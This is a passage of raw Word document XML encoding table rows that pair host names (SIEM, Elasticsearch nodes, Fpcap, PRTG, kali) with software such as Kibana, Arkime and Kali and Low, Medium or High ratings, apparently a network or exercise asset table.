                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006016C4" w:rsidRPr="006016C4" w14:paraId="2BBEE816" w14:textId="77777777" w:rsidTr="006016C4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2370" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09A7EED0" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>SIEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3068" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A81562A" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Kibana</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1ED3505E" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006016C4" w:rsidRPr="006016C4" w14:paraId="23F5B88B" w14:textId="77777777" w:rsidTr="006016C4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2370" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55DA67D6" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Elasticsearch1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3068" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36CE6066" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Elasticsearch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2654F2DC" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006016C4" w:rsidRPr="006016C4" w14:paraId="5F59E107" w14:textId="77777777" w:rsidTr="006016C4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2370" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24B55F13" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Elasticsearch2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3068" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D0D26AE" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Elasticsearch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C91C5B0" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006016C4" w:rsidRPr="006016C4" w14:paraId="2E32C8C1" w14:textId="77777777" w:rsidTr="006016C4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2370" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="161ABF8F" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Elasticsearch3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3068" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B3387A6" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Elasticsearch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22E7B5B6" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006016C4" w:rsidRPr="006016C4" w14:paraId="04968D47" w14:textId="77777777" w:rsidTr="006016C4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2370" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D4C7272" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Fpcap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3068" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28CF738E" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Arkime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3990D70B" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006016C4" w:rsidRPr="006016C4" w14:paraId="1D9C8B9F" w14:textId="77777777" w:rsidTr="006016C4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2370" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EB68CD3" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>PRTG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3068" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C453EB0" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>PRTG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6782BD14" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006016C4" w:rsidRPr="006016C4" w14:paraId="681E3BAD" w14:textId="77777777" w:rsidTr="006016C4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2370" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19A5270F" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>kali</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3068" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FD82B2F" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Kali</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52FDA7E1" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
